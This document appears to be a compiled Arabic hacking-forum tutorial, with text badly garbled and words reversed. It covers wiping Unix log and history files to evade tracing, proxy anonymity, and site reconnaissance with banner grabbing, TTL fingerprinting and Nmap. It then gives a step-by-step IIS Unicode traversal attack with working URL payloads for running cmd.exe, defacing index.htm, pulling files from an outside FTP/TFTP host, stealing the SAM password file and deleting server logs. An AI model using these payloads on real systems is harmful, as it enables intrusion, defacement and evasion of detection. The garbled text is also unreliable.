يفنى . ادم ابن عمر ان اتوقع والله بل عنه شيء كل لكتابة معدودةما كل مستواه تقدم ما وكل االنترنت على االمن عن يبحث وهو
التخفي اجل من به يقوم ان يجب وما حوله ما كل تماما يعي اصبحاالثر تعقب .... ومنع
اجراءاتك : فيه يسجل التي النظام يخصملفات األول ... القسم) LOG File (
يقفعن : ... وهذا خصوصياتك وحماية باتصالك يتعلق الثاني القسمشخصفينا كل .... قدرات
، عنك المعلومات تجمع انترنت في االجهزة جميع الواقع فيال عنوان مثل رقم IP ابسطها و اسمك مثل حساسية اكثرها و
جهاز ........ و ملفاتك البريدي عنوانك و ربما الخاصبك الهاتفبواسطة بانترنت ارتبط لو للغاية جيدة بصورة محمي كومبيوترك
حتى ولكن اضافية، برمجيات استخدام بدون و فقط التشغيل نظامالجهاز سيفقد االولى القليلة االسابيع غضون ففي ذلك حصل ولو
تتابع النترنت سليم الغير لالستخدام نتيجة حمايته اجزاء من الكثيرالثغراتفي يتابع الكل بشدة، التشغيل نظم Microsoft الشركات
Windows و Linux و Mac الى الوصول الصعب من لذلك ، غيرهما ورسمي تدخل بدون و فورية بصورة االجهزة .... تلك
ان الله واسال المجال لهذا طريقي بداية في الزلت انا والحقيقةفضله من علينا ويفتح .. يسهل
اجراءاتك : فيه يسجل التي النظام يخصملفات األول ... القسمتسمى الجراءاتك التسجيل بملفات يتعلق مؤرخه . ) LOG File ( ما
واإلجراء . بالوقتاألداء ملفاتسجل تسمى كما االحداث سجل وتسمى
الويب مزودات جميع عن )Web servers( تسجل واسعة معلوماتاألداء ملفاتسجل ضمن موقعك، إلى الوصول ،)log files( حركة
الكمبيوتر نشاطات تلتقط نصوصبسيطة ملفات عن عبارة وهيكان. ما وهذا يدويا، األداء معلوماتسجل تحليل ويمكن المزود
. ملفسجل حجم زاد إذا لكن ويب شبكة بدايات في الناس، يفعلهغير )log file( األداء يصبح اليدوي التحليل فإن بايتات، كيلو بضعة عن
. مزودات أن االعتبار بعين أخذت وإذا كليا مستحيال يكن لم إن عملي،كثيرة، ميجابايتات إلى حجمها يصل األداء، لسجل ملفات تولد اليوم
ألدركت أكثر، أو جيجابايت إلى األحيان من كثير في ويصل بل إطالقا وارد غير اليدوي التحليل أن .ببساطة
األداء ملفاتسجلعلى األداء، ملفاتسجل تحتوي تستخدمه، الذي الويب لمزود تبعا
- بها- يقوم زيارة لكل التالية، المعلومات جميع المحتمل ومن بعضموقعك إلى :زائر
كل تراقب وهي لها الووصول يمكنك ال ملفات ثمة ان أخبرك وأريدقدرات ... حسب الخر نظام من األمنية االجراءات وتختلف اجراءاتك
عليه تعمل الذي النظام ... مدير
:اقتباس________________________________________
نظام في الملفات هذه عن هيكستكلم أخوي . WIN NT عمومالدرسه الرجوع ويمكن فايل اللوق إزالة يتم ... وكيف
________________________________________
كلشي تزيل ان يشترط وال اهمها عن اخبرك راح االن : واناجله ( يترك ال كله يدرك ال تستطع ) ) فما لم إذا تحبط ال حتى ودائما
تستطيع ( ما إلى وجاوزه فدعه شيئااستخدام ... هي يونكس انظمة مع للتعامل المثلى الطريقه عموما
قدرات من ذهول اعيشفي االن إلى فأنا رأيي وهذا النصي الشلاالمكانيات ... الدوسصاحب ان يكفي العجوز النظام هذا
أداة .. أو جزء األصل في هو واالستجابه التنفيذ وسرعة والسهولةواال تطويرها على مايكروسوفت يونيكسوعملت أدوات من
ادنيشك يونكسبال هو ... فاالصلالشل تستخدم ما كل تحذفها أريدك حاليا الملفات أهم عموما
كالتالي . هي : النصي.lastlogin
يبدا مجلد أو ملف فاي ملفمخفي انه يعني مما بنقطه بدايتهيوينيكس في مباشرة مخفي هو اذا . بنقطه
الدخول سجل ايبي اخر به يسجل الملف . وهذا
.bash_historyنفذتها التي األوامر جميع تسجل راح هنا
.contactemailالبريد مع للتعامل النصي الشل تستخدم كنت ما اذا
المجلدين هذين حذف منك أريد أيضاTmp واالخر .trash مجلد معهم تنسف حبذا . etc ويا
البعض يعرفها ربما مشكلة . هناملفي حذفت كوني lastlogin & .bash_history. هو
االمر ملف rm باستخدام تجدد االجراء هذا ناتج يكون راح تلقائياbash_history. الباش
محتواه : ليصبحrm .bash_historyrm .bash_history
ملف ناتج يكون مره lastlogin. وراح اخر به دخلت الذي االيبي . هوتظهر الحذف أوامر نريد وما نهائيا ننسفها الحل وش .... طيب
تستخدم هناك . cpanel الطريقة أخون يا وللعلم إجراء أفضل هوواالبتكار التجديد ومن االبداع من اليونكستمكنك في جباره اعدادت
..
بااليبي كامل بالنظام اللعب يمكنك حتى للعلم أخواني عموماالموضوع localhost : المحلي هذا عن تكلمنا العمر في الله مد واذا
الله ... باذن
وبنفس : مشفوتوشوب بانل سي من وهي الصورة هذه الحظالحقيقي المصدر عن معلومات اي بال السيرفر في تتحكم الطريقة
.... لالتصال
من اعمل اني والله بالعمر الله مد اذا الموضوع لهذا سأعود عمومايونيكس الحتراف عملي وتطبيق دروسنظرية كتابة على ... اشهر
يكن لم وإن حتى وحذفها اللوق ملفات عن الحديث نكمل وراحالحذف ... تستطيع فوالله بملكيات لك ... مسموح
االخر للجزء ... ننتقليقفعن : ... وهذا خصوصياتك وحماية باتصالك يتعلق الثاني القسم
شخصفينا كل .... قدرات
البروكسي نفس إما يستخدم منا األغلب أن المشكلة الحقيقة أخوياشتغل .. .. الله سهل وان يستخدمه اللي الخدمه لمستضيف
التصفح بروتوكوالت مع يعمل أن ) HTTP Protocol( ببروكسي ويجبالشبيهه االخرى االنظمة يونيكسأو نظام مع تتعامل حين أنك ندرك
ال فهذا للتصفح المعتاده البروكسيات تستخدم كونك ان والحقيقةبروتوكوالت استخدمت اذا هويتك األمثل .... HTTP يخفي الحل ولكن
السوكس بروكسيات تستخدم عليك . SOCKS Protocol أنك فيجبالحاجة عند أو لخصوصيتك حماية سوكسالستخدامها ارقام إيجاد
النظام على عملك اناء . للتخفيأنواع ثالثة مجملها في البروكسيات . عموما
1( Web Proxy Service للتصفح . HTTP Protocol . وهذا2( WinSock Proxy Service سيرفرات مع مفيد windows NT وهذا
بروتوكوالت على العمل عند هويتك اخفاء على عملها في ويفيدtelnet أو FTP البروتوكول هو ...... WinSock Protocol وهذا
3( Socks Proxy Service . في منه ويستفاد األقوى )SSL( وهذاSecure Sockets Layers إلى IIS( Internet Information( باالضافة
Server مع ، FTP وكذلك Windows NT ويخدم Telnet ، Gopher،IRC ، RealAudio ، POP3 كونه بين يجمع النوع إلى firewall وهذا إضافة
أمنية موارد ... securiy . خدمة معلومات تغيير في وظيفته وتكمنبروتوكول ..... فيها يستخدم ما وعادة بها تتصل التي االنترنت خدمة
TCP/IP لالتصال وسيلتين البروتوكول هذا : ويستخدمالعالمية * المنظمة Internationa Organization for( طريقة
Standardization(األمريكية . ** الدفاع وزارة وضعتها لالتصاالت بروتوكوالت . مجموعة
ransmission Control Protocol TC ... كثيرا تساعدك برامج ثمة أن وهو جدا هام أمر هناك أخواني الحقيقة
ال التي الرقابة تقنيات من التخفي في تساعدك المحترفة بتقنياتها ... جدا كثر وهي نظام منها : يخلوا
Ping ، Traceroute, DNS lookup, Finger, Whois, LDAP, SNMP وهذا يستخدمه الذي االتصال بروتوكول واعتبار النظام باعتبار يكون
وتوكول ... WIN NT : نظام من النظام TCP/IP ويستفيد ... لمراقبةنظام مراقبة يتم الرواتر UNIX وبالمقابل طريق وهو Router . عن
أو الموجه أي المصطلح بهذا ونعني النظام لتشخيص فعاله أداةأجزاء من جزء كل على التعرف على بقدرته الراوتر ويتميز الموزع
ويسمح البيانات سير وموازنة األداء مراقبة عى ويعمل الشبكةومواصفاتها ... استقالليتها على بالحفاظ المتصلة للشبكات
الخاصة . وعناوينهاالموزعات أو للموجهات نوعين إستاتيكي : . ) Router( وهنا األول
يدوي ضبط الشبكة مدير من . يتطلبباالمان النوع هذا . ويتميز
ضبط .... ... الى ويحتاج اتوماتيكيا بأعماله يقوم ديناميكي والثانياألول من أمانا أقل وهو . بسيط
إخواني . عموما الموضوع هذا في تفرعت ربما اسف انا عموماتزوير ... أو إخفاء أو بتشفير عليكم لكم أقول أنا لالتصال بالنسبةهذه ... . بمراقبة وعليكم بدون أو ببرامج طريقة باي بياناتكم
: البورتات
http://www.analogx.com/files/proxyi.exe
اسمه آخر برنامج PortBlocker : ويدعمهنقلك أو تصفحك في تستخدمه التي البورتات حماية في يساهم
وتسجيل تحركاتك مراقبة في تستخدم ان من غيرهما أو للملفات: معلوماتك
PortBlocker is configured to block the most common types of servers that might be on a system )FTP, HTTP, etc(, so will not require any modification for most users. If you are running a
special server of some sort, then you can easily add it's ports )either TCP or UDP( to it's list, and have them blocked and/or
logged.Log unauthorized port access attempts and secure internal
servers from internet access easily...
برنامج هنا من PortBlocker حملhttp://www.analogx.com/files/pblocki.exe
الذي وهو المميز البرنامج بهذا ذكرني الذي الله أحمد والحقيقةعلى عملك أناء لمراقبتك سجلت التي المعلومات كل لك يوضح
. نظامكالتجسسي بطبعها معروفة مايكروسوفت أن تعلمون كلكم بالطبع
...وال عنكم تسجيله تم ما كل تعرفوا لكي البرنامج هذا لكم فأقدم
المعلومات ... من الهائل الكم ان متأكد الني دعوة من تنسونيأن لها آن ولكن وخفية منتظمة غيرك وعن عنك والتقارير المرسلة
... تفضحالبرنامج Proxy Log Analyzer : اسم
1.07للتحميل : MB ضغط بدونhttp://www.mechanicalminds.com/software/pla/setup.exe
ZIP archive instructions 818 kb http://www.mechanicalminds.com/software/pla/pla.zip
تحب كما البيانات بتعبئة لك يسمح المتصفح أن عن . ناهيكProvides a space for you to type the address and port number of the proxy server you want to use to gain access to the Internet
over HTTP, Secure, FTP, Gopher, and Socks protocols.لالتصال المتقدمة االعدادت استخدام : فقط
أي حصول بال ملفاتك كل ترسل بامكانك بالماسنجر االيبي حتىلك الحقيقي االيبي على . انسان
خذ ... ادوات قائمة من الماسنجر افتح اذهب سهله والطريقة. خيارات
،،،انتهىمتخفيا HTTP Port برنامج" النت تتصفح يجعلك "!!الذي
> دوس نجم منتدى من >منقول> المدمر: >الكاتب
البرنامج :اسم------------------------
HTTPort 3snf------------------------
:الوظيفة------------------------وأمان بسرية لتصفح برنامج
األنترنت في
الرقمية البروكسيات من ويريحك
عنها البحث ومن
,,,,,,,,,,,,------------------------
التحميل وصلة------------------------
http://www.angelfire.com/tv2/ssdd63/httport3snf.zip------------------------
شبكة " أو موقع عن المعلومات بجمع القيام " كيفية
> إعصار منتدى من >منقول> المدمر: >الكاتب
كانت أيا شبكة أو سيرفر أو موقع ألي المعلومات جمع : طرق
=) األولى =)الطريقة^^^^^^^^^^^^^^^^^^^
موقع زيارة خالل من وهيhttp://www.netcraft.com/
كثير تفيدك معلومات يعرضلك وراح هناك الموقع وتكتب^^^^^^^^^^^^^^^^^^^
=) الثانية =)الطريقة^^^^^^^^^^^^^^^^^^^
ولنفرض عملها مدى الادري لكني حديثا تستخدم قديمة وهيهو عنه معلومات نجيب نبي الي الموقع
http://www.almodammer.com/مثل موجود وغير وهمي إليميل رسالة بإرسال نقوم
dfl;kjgk'[email protected]تعرض ولما رد تستقبل راح وهمي إليميل رسالة ارسال وبعد
الموقع Headersالـ عن معلومات تالقي راح بالرسالة الخاص^^^^^^^^^^^^^^^^^^^
=) الثالثة =)الطريقة^^^^^^^^^^^^^^^^^^^
Bannersالـالبانر؟ ماهو
ما أمر تنفذ عندما تأتيك التي الرسائل هي شديد وباختصار البانرالرد ..يعني
الموقع؟ معلومات كشف في نستغلها راح وكيفأداة طريقة تقوم Telnet Client عن أن هي والطريقة التلنت عميل
كان سواء المنافذ بأحد باالتصالFTP 21أو
TELNET 23^^^^^^^^^^^^^^^^^^^
=) الرابعة =)الطريقة^^^^^^^^^^^^^^^^^^^
HTTP وهيHyper Text Transfer Protocol
المنفذ على 8080 - 80ويعملالمنفذ على نتصل طريق 80ألحين عن Telnet األمر نكتب وبعدين
التاليGET /qwe HTTP/1.1
الخطأ صفحات بوجود البانر يخبرنا راح كذا 400بعدالهدف عن هائلة معلومات تجيك وراح
وهو ثاني امر عندك :وفيهHEAD 127.0.0.1 HTTP/1.1
بتنفيذه ... تقوم^^^^^^^^^^^^^^^^^^^
=) الخامسة =)الطريقة^^^^^^^^^^^^^^^^^^^
أمر من للـ ping وهي طلبات عدة بإرسال يقوم للموقع ipالذي أوهائلة وبسرعة الردود باستقبال ويقوم
للموقع معلومات تحديد في منها نستفيد كيف ! الحينالتالي بوضع تقوم حيثping ipsite
ipsite= بالموقع الخاص بي اآليكلمة اال مايهمنا حنا اسطر عدة يطلعلك وراح
TTL=XXXXXX= طلعلك الي والعدد القيمة
التشغيل نظام تحديد يمكن خالله من أقولك وشفايدته بتقوليامثلة :وهذي
Windows 9x/NT Intel 32 Windows 9x/NT Intel 128 Windows 2000 Intel 128 DigitalUnix 4.0 Alpha 60
Unisys x Main***** 64 Linux 2.2.x Intel 64
FTX)UNIX( 3.3 STRATUS 64 SCO R5 Compaq 64
Netware 4.11 Intel 128 AIX 4.3.x IBM/RS6000 60 AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60 Cisco 12.0 2514 255
IRIX 6.x SGI 60 FreeBSD 3.x Intel 64 OpenBSD 2.x Intel 64 Solaris 8 Intel/Spar 64
Solaris 2.x Intel/Sparc 255واحد يساوي الفرق يكون حيث القيم في اختالف يحدث وقد
مرور: عند ( data list or packet أي بيانات قائمة او Nodesبـ )حزمأن بـ TTL حيث 1تنقص
أمر تستعمل ان عليك أما tracert لذلك الويندوز فهو traceroute فيباليونكس خاص
الموقع أو الشخص عن بعرضمعلومات خاص امر وهوالطريقة بهذه استخدامه ويمكننا
tracert ipip= السخص أو الموقع عنوان
^^^^^^^^^^^^^^^^^^^
=) السادسة =)الطريقة^^^^^^^^^^^^^^^^^^^
والبرامج األدوات طريقة عناألسهل Windows أوال ألنه
المفتوحة المنافذ او والسيرفر الموقع عن معلومات تحديد يمكنكمن بكثير المنافذ استغالل ويمكنك برنامج اي تطبيق قبل من
الثاني الدرس في لها نطرق وسوف االختراق عمليات
برنامج كل مو ان تعرفون لكن برامج مليان الويندوز ان تعرفوناالفضل اذكر راح كذا عشان برنامج أي : مثل
N-Stealth ) الخ ... ثغرات المنفذ منها الشبكة عن معلومات )لتحديد=============
Shadow Sceurity Scanner ( المنافذ عن البحث برامج أفضل منلكيفية شرح وجود مع الثغرات ومعظم والعمليات والتطبيقات
)عالجها=============
SuperScan ( المواقع الختراق استخدمه فأنا المفضل برنامجيبالموقع المفتوح المنافذ معرفة في كثيرا يساعدني حيث واألجهزة
على ويحتوي شئت List واألجهزة كيفما عليها اإلضافة يمنك )كبيرة-------------------------------------------------------------------------
على نجي Linux الحينبجدارته ليونكسيشهدون مستخدمين وأكثر مفضل واحد برنامج هو
اسم يحمل والذيNmap
لـ ( Network Maperاختصار الشبكات )مستكشفدائما كذا علشان ويندوز وطرق ويندوز ادوات كل يفوق وطبعا
بـ باختراق Linuxينصح للمتهمين خاص وهو/ السيرفرات/ المواقع الشبكات
استمعاله : كيفيةمثل nmap شغل ظهرت الذي األوامر من الكثير تجد /وراح[l] Nmap V. 3.00 Usage: nmap [Scan Type)s(] [Options]
Some Common Scan Types )'*' options require root privileges(* -sS TCP SYN stealth port scan )default if privileged )root((-sT TCP connect)( port scan )default for unprivileged users(
* -sU UDP port scan-sP ping scan )Find any reachable machines(
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan )experts only(-sR/-I RPC/Identd scan )use with other scan types(
Some Common Options )none are required, most can be combined(:
* -O Use TCP/IP fingerprinting to guess remote operating system-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts )needed to scan http://www.microsoft.com/ and others(
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to -iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface--interactive Go into interactive mode )then press h for help(Example: nmap -v -sS -O http://www.my.com/ 192.168.0.0/16
'192.88-90.*.*'SEE THE MAN PAGE FOR MANY MORE OPTIONS,
DESCRIPTIONS, AND EXAMPLES
المجهولة االوامر من العديد يحتوي !!!!!!!!! وأيضاإلى بالذهاب قم اكثر ومعلومات الخاص man page ولخلفية
..بالبرنامجوهو أمر أهم لنشرح
nmap -sS -O -vv almodammer.comalmodammer.com= فحصه المراد الموقع
وأدوات برامج معلومات تفوق هائلة معلومات يعرضلك وراحويندوز
والسيرفر والملقم واإلصدار المنافذ ....... منها^^^^^^^^^^^^^^^^^^^
=( السابعة =)الطريقة^^^^^^^^^^^^^^^^^^^
جهازك وجود على تطبق Shell Account أو Linux تعتمد تقدر حتىتركب لو لكن الويندوز اليونكسفي ألن Linux اوامر Shell أفضلوركب نفسك التتعب كذا علشان مناسب وسعره ممتاز يكون الزم
Linux وارتاحأمر هذا whois المهم
لنا يوفره دقيقة Linux والي وغير وثقيلة كبيرة كبرامج والويندوزاألمر اضف أكثر ولمعلومات
man whois -------------------------------------------------------------------
البحثفي فيمكنك الويندوز طريق عن google أماhttp://www.google.com/search?q=whois&btnG=Google+Searchو سكربتات وهي الخدمة هذي تقدم المواقع من تقوم cgi والكثير
بسيط اختالف مع ذكرتها التي الطرق بإحدى الموقع عن بالبحثبموقع شبيهة األولى netcraft وهي ..............الطريقة
16." ) األول ) الجزء اليونيكود طريق عن " اإلختراق>منقول<
>sNiper_hEx :الكاتب<على ) الدرساالول يلي ( 13يحتوى كما وهي نقطة :-
باليونيكود - . تعريفالثغرة - هذه ظهور . تاريخ
الثغرات - هذه ايجاد . كيفيةاليونكود - ثغرات استغالل يتم . كيف
ملف - بواسطة المستخدمة . CMD االوامرالثغرات - هذه تطبيق . طريقة
الـ - امر تفعيل من تتمكن حتى اليونيكود ثغرة اختصار . ECHO كيفيةالـ - ملف نسخ الملفات CMD طريقة على الكتابة امكانية . التاحةالـ - مشكلة معرفة لها Access Denied كيفية المتبعة . والحلول
الـ - بواسطة للدخول اكاونت عمل . FTPكيفيةاالدمينستريتور - باسورد كشف . طريقة
برنامج - بواسطة لوود االب وعملية للموقع الرئيسية الصفحة تغييرTFTP .
عليك - التعرف يتم ال حتى اللوق ملفات . مسح
باليونيكود - . تعريفخدمة مجموعة في الثغرات من مجموعة عن عبارة اليونيكود
مع ركبت التي مع IIS4.0 / IIS5.0 المعلومات عادة ياتي / NT4 والذيWin2k .
الثغرة - هذه ظهور . تاريخظهورها يعتبر لذا لليونيكود ثغرة اول لظهور محدد تاريخ اليوجد
شخصمجهول ، anonymous person بواسطة ظهور اول ان وقيلمايثبتصحة اليوجد ولكن الصينين بواسطة كانت اليونيكود لثغرات
قبل من الثغرات هذه استغالل فتم ، الثغرات لهذه الكالم هذالها الالزمة البرامج وتطوير . المخترقين
الثغرات - هذه ايجاد . كيفيةبطريقتين الثغرات هذه ايجاد -: يتم
سواء -1 الثغرات هذه لكشف والمخصصة الالزمة البرامج بواسطةتعمل والتي الشل بطريقة او ويندوز نظام على تعمل التي بالبرامج
لينكس نظام . علىمباشرة -2 الموقع على الثغرة تطبيق . بواسطة
اليونكود - ثغرات استغالل يتم . كيفالـ نظام على الثغرة تطبيق ملف IIS4 / IIS5 عند CMD يبدا شفرة بفك
استغاللها يتم هنا ومن الخطاء المثال في . اليونكود
ملف - بواسطة المستخدمة . CMD االوامرالـ ملف بواسطة المستخدمه دليل CMDاالوامر النشاء امر وهي
وامر الحذف وامر النقل وامر النسخ وامر دليل اللغاء وامر جديدداخل الكتابة وامر الملف محتويات لرؤية وامر الملفات اسماء تغيير
التالية االمثلة وهيحسب ، ملف أي لسحب وامر ملف -: أيدليل انشاء امر
http://www.xxxx.com/msadc/..%c0%af.....e?/c+md+c:\hEx :جديد
الغاء امر http://www.xxxx.com/msadc/..%c0%af.....e?/c+rd+c:\hEx :دليل
الملفات: من تمام فارغا كان اذا اال دليل أي الغاء اليمكن للمعلوميةوالمجلدات
للنسخ المستخدم :االمرhttp://www.xxxx.com/msadc/..%c0%af.....cripts\hEx.exe
للنقل المستخدم :االمرhttp://www.xxxx.com/msadc/..%c0%af.....ts\hEx.exe+c:\
للحذف المستخدم ../http://www.xxxx.com/msadc :االمر%c0%af.....del+c:\hEx.mdb
مسمى لتغيير المستخدم االمر../http://www.xxxx.com/msadc :الملفات
%c0%af.....ex.htm+hEx.htm
محتويات لرؤية المستخدم االمرhttp://www.xxxx.com/msadc/..%c0%af.....ype+c:\hEx.txt :الملف
ملف أي داخل للكتابة المستخدم :االمرhttp://www.xxxx.com/msadc/..%c0%af../winnt/system32/cmd.exe?/
c+echo+sNiper_hEx+<c:\hEx.txt
ملف أي سحب لعملية المستخدم :االمريتم وبعدها دليل أي الى سحبه المراد الملف بنسخ اوال القيام عليك
كالتالي العنوان اخر الملففي اسم :كتابةhttp://www.xxxx.com/msadc/hEx.mdb
الثغرات - هذه تطبيق . طريقةاالمثلة حسب تتم المتصفح خالل من الموقع على الثغرة تطبيق
-: التاليةhttp://www.xxxx.com/scripts/..%c1%1c...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%9v...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%af...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c0%qf...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c1%8s...exe?/c+dir+c:\http://www.xxxx.com/scripts/..%c1%9c...exe?/c+dir+c:\
http://www.xxxx.com/scripts/..%c1%pc...cmd.exe?/c+dir +c:\يكون بحيث الدليل مسمى تغيير الى نحتاج -: وقد
Msadc , _vti_bin , iisadmpwd , _vit_admin , scripts , samples , cgi-bin
الـ - امر تفعيل من تتمكن حتى اليونيكود ثغرة اختصار . ECHO كيفيةانه ولنفترض اليونيكود مشكلة من يعاني موقع اكتشاف حالة في
الثغرة هذه على -: كانhttp://www.xxxx.com/msadc/..%c0%af.....exe?/c+dir+c:\
ملف نسخ الى مجلد w3svc.exe فنحتاج واالمر inetpub\scripts الىالطريقة بهذه -: يكون
http://www.xxxx.com/msadc/..%c0%af.....ipts\w3svc.exe
ملف نسخ مجلد w3svc.exe بعد ، inetpub\scripts الى نقوم االنالطريقة بهذه الثغرة خالل من الموقع -: بتصفح
http://www.xxxx.com/scripts/w3svc.exe?/c+dir+c:\الرئيسي الملف وبالتحديد ملف أي داخل الكتابة نستطيع االن
الدليل هذا في مايكون غالبا الذي للموقعinetpub\wwwroot\index.htm التالي بالشكل االمر يكون -: بحيث
http://www.xxxx.com/scripts/w3svc.exe?/[email protected]+<+c :\inetpub\wwwroot\index.htm
الـ - ملف نسخ الملفات CMDطريقة على الكتابة امكانية . التاحةالـ ملف نسخ داخل CMDالغرضمن للكتابة امكانية العطاء وهو
بهذه السيكربت مجلد الى نسخه ويتم الحاالت بعض في السيرفر-: الطريقة
http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exeالـ ملف استخدام بامكاننا االول CMDاالن من بدال الثغرة في الجديد
الشكل -: بهذاhttp://www.xxxx.com/msadc/..%c0%af......exe?c+dir+c:\
الـ - مشكلة معرفة لها Access Denied كيفية المتبعة . والحلولالـ مشكلة معرفة حذف Access Deniedتتم في المحاولة خالل من
الـ رسالة ظهور فعند ، امتداد أي ملفمن فاليك Access Denied أيعلى اكثر والتحكم الملفات على الكتابة من تتمكن حتى الطرق هذه
-: السيرفرالـ -1 ملف نسخ االولى بمسمى CMD الطريقة السيكربت دليل الى
CMD1 االمر باستخدام الكتابة امكانية لك يتاح Copy فسوفاالمر هذا -: باستخدام
http://www.xxxx.com/msadc/..%c0%af.....ripts\cmd1.exeالملف -2 مع بالتعامل الثانية يلي ssinc.dll الطريقة كما -: والطريقة
o باسم صفحة انشاء test.shtml اوالo مجلد داخل الصفحة هذه wwwroot/hEx/test.shtml تكون
o الصفحة داخل الكود هذا >--"include file="AAAA[...]AA#--!< كتابةحرف ان يتعدى A بحيث حتى كتابتة حرف 2049يتم .
o خالل من الصفحة طلب يتم االنhttp://www.xxxx.com/test.shtml المتصفح
o الصفحة لك تظهر سوف . االنo الـ مشكلة تخطي وتم الكتابه تستطيع . Access Deniedاالن
o رقم الخطاء صفحة لك ظهرت بتطبيق 500اذا تقم لم انك فمعناها المحاولة اعادة وعليك الصحيح بالشكل . الطريقة
برنامج -3 باستخدام الثالثة لوود NC.exe الطريقة اب عمل يتم بحيثالـ مجلد داخل الملف تنفيذ Tempلهذا يتم ومنه الويندوز دليل في
الـ مجلد وللمعلومية الدوز موجة خالل من مفتوح Tempاالوامرلوود االب . لعمليات
باستخدام -4 كراشللسيرفر عمل خالل من وهي الرابعة الطريقةمن كثير في مجديه غير الطريقة الغرضوهذه لهذا الالزمة البرامج
. االحيانملفات -5 عن ، root.exe : البحث sensepost.exe ، shell.exe ،
w3svc.exe مجلد الى من c:\inetpub\scripts ونسخها الثغرة وتطبيق. خاللها
الـ - بواسطة للدخول اكاونت عمل . FTPكيفيةملف -1 مجلد CMD نسخ يتم Shell.exe باسم Scripts الى حتى
قديمة ثغرة من االستفادة/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\script s\shell.exeملف -2 االمر mspft.pll انشاء التالي Echo بواسطة فيه open وكتابة
ftp.host.com للـ الخادم هو هذا ان . FTPحيث/c+echo+open+ftp.host.com+<+c:\winnt\mspft.ppl
مجهول -3 اضافة مطلوب الذي Anonymous االن نفسالملف الىبانشاءه mspft.pll قمنا
/shell.exe?/c+echo+anonymous+<<+c:\winnt\mspft.ppl
البريد -4 ادراج مطلوب [email protected] االن نفس الىبانشاءه قمنا الذي mspft.pll الملف
/shell.exe?/[email protected]+<<+c:\winnt\mspft.pplبانشاءه Anonymous قبل User إضافة -5 قمنا الذي الملف لزوم
mspft.pll /shell.exe?/c+echo+user+anonymous+<<+c:\winnt\mspft.ppl
االعداد -6 لحاجة تكرار االن/shell.exe?/[email protected]+<<+c:\winnt\mspft.ppl
للملفات -7 الحالي الموقع ادراج هنا يتم/shell.exe?/c+echo+lcd+c:\inetpub\wwwroot+<<+c:\winnt\mspft.pp
lالـ -8 اوامر يكتب الـ FTPاالن خادم الملفمن لسحب FTPالالزمة
السابق Get index.htm وهي المسج بدون هنا يدرج ثم/shell.exe?/c+echo+get+index.html+<<+c:\winnt\mspft.ppl
باضافة -9 ولكن نفسالسابق Quit هنا/shell.exe?/c+echo+quit+<<+c:\winnt\mspft.ppl
امر -10 تنفيذ يتم عبارة ”FTP.exe?+"-s:c:winnt\mspft.ppl االن وهوملف في وموجودة بانشاءها قمنا خطوات باحتوائها mspft.ppl عن
مايلي -: على- Open FTP.host.com
- Anonymous- [email protected] User Anonymous
- [email protected] Get index.html
- Quit
/msadc/..%c0%af../..%c0%af../winnt/system32/ftp.exe?+"-s:c:\winnt\mspft.ppl"
االدمينستريتور - باسورد كشف . طريقةبرنامجين وجود الى وهي ) Microsoft Access – L0phtCrack ( نحتاج
وهي لتالية الخطوات بعض تنفيذ -: لزومالـ - ملف في موجود يكون للسيرفر االدمينستيتور _.SAM باسورد
دليل هو \winnt\repair\ في الباسورد شفرة لفك برنامج وافضل L0phtCrack برنامج
فان - حساب لديهم ويوجد السيرفر في مستخدمين هناك كان اذاملف في تكون سوف تحديد PASSFILT.DLL معلوماتهم ونستطيع
المفتاح هذا بواسطة الريجستري خالل الملفمن هذا -: مسارHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\
Lsa\SYSTEM32\PASSFILT.DLL
الـ - صفحات باستخدام القراءة في يعتمد السيرفر كان ASP اذاالـ قاعدة خالل من البيانات الى الى MySQL للوصول نحتاج فسوف
ثغرة هذة ) htr.+ ( تطبيق عن المسئول باسورد الى للوصولكالتالي وهي -: القاعده
http://www.xxxx.com/default.asp+.htr
المطلوبة الصفحة الى الوصول في الخطا صفحة ظهور عند
فقط وماعلينا صحيحة فالطريقة التنفيذ سيكربت في وبالتحديدملف سحب اسم database.inc سوى على للعثور محتوياته وقراءة
البيانات قاعدة عن للمسئول والباسورد . المستخدم
برنامج - بواسطة لوود االب وعملية للموقع الرئيسية الصفحة تغييرTFTP .
باسم -1 واحفظها عليها شعارك وضع صفحة بانشاء index.htm قمالـ \:c على
برنامج -2 بتشغيل التالية TFTP قم الفقرة في االمر . ونفذ
/c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index. htm
عليك - التعرف يتم ال حتى اللوق ملفات . مسحالـ ملفات حذف خالل من العملية هذه مجلد Log وتتم System32 من
االمر -: بواسطة/c+del+c:/winnt/system32/logfiles/*.log
،،، انتهى
" ) الثاني ) الجزء اليونيكود طريق عن " اإلختراق
> اإلسالمية الحزم شبكة منتديات من >منقول
الجميع يستطيع اساسية اوامر عن عبارة كان الدرساألول فيوالمهارة .. الذكاء بعض يتطلب الدرسفاألمر هذا في اما .. تطبيقها
: البداية--------------
) القيام ) عليك شي اول فان يونيكود ما بثغرة مصاب موقع وجود عندمجلد نسخ هو الطريقة cmd1 الى cmd به : بهذه
C+copy+c:\winnt\system32+c:\winnt\system32\cmd1.exe الكتابة امر تفعيل هو .. Echo والسبب
الجديد الملف من الثغرة نفذ ذلك يعرفه ( CMD1.exe وبعد شي هذافقط ) الجميع للتذكير ! لكن
هذه .. خالل من المتصفح من الموقع لملفات تصفحك عند االنصالحيات لديك سيكون فانه هو IWAM_USER الثغرة المستخدم وهذا
للمجموعه ينتمي يوزر عن عن Guest عبارة المسؤوول اليوزر وهوسيرفر . IIS تشغيل
مجموعة من انه تم !! Guest وبما اذا اال كثيرة صالحيات يملك ال فهوسيء بشكل اعداده
رووت على الحصول محاولة من ادمانا اكثر شي في اليوجد هذا
